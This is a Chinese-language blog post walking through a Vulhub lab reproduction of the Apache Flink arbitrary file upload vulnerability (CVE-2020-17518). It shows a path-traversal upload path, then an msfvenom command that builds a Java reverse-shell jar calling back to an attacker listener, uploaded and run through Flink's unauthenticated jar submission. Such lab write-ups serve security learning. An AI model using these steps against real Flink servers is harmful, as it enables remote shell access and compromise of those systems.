Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式数据流引擎。

Apache Flink****任意文件上传漏洞(CVE-2020-17518)

Apache Flink 1.5.1引入了REST处理程序,由于功能上存在缺陷,攻击者可以通过修改HTTP HEADER将恶意文件写入到本地文件系统上的任意位置,并可通过Flink 访问。

影响范围:

Apache Flink 1.5.1-1.11.2

复现流程

上传文件进行抓包,更改上传路径,

image-20210913172801220

要看目录有没有上传成功,需要进行某些操作

docker ps查看进程id

image-20210913172442003

docker exec -it 6ddef1bcfa56 /bin/bash

cd /tmp别管有没有tmp文件夹,cd就对了

然后ls,查看有没有上传成功

image-20210913172709351

终于在../../../../../../tmp/succes上传成功

image-20210913172216621

此外,flink 本身是没有鉴权的,并且它本身支持任意jar包上传并执行,所以可以通过上传jar包getshell

生成java执行木马

msfvenom -p java/shell_reverse_tcp LHOST=192.168.106.138 LPORT=1234 -f jar -o a.jar

然后上传

设置并启用监听

image-20210913174336385

上传成功之后,点击submit运行

image-20210913174415819

获取shell了

image-20210913174455820

防御措施

更新版本

posted @ 2021-09-13 17:51  1ink  阅读(828)  评论(0编辑  收藏  举报